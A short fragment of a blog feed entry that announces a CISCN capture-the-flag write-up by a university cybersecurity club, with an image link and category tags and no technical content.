<summary type="html"><blockquote>
<p>WP来自齐鲁师范学院网络安全社团<br><img src="https://img-blog.csdnimg.cn/68def0711ab44a01be039f449062fe4b.png?x-oss-process=image/watermark</summary>
<category term="CTF" scheme="https://oceansec.github.io/categories/CTF/"/>
<category term="CISCN,wp" scheme="https://oceansec.github.io/tags/CISCN-wp/"/>
</entry>
</feed>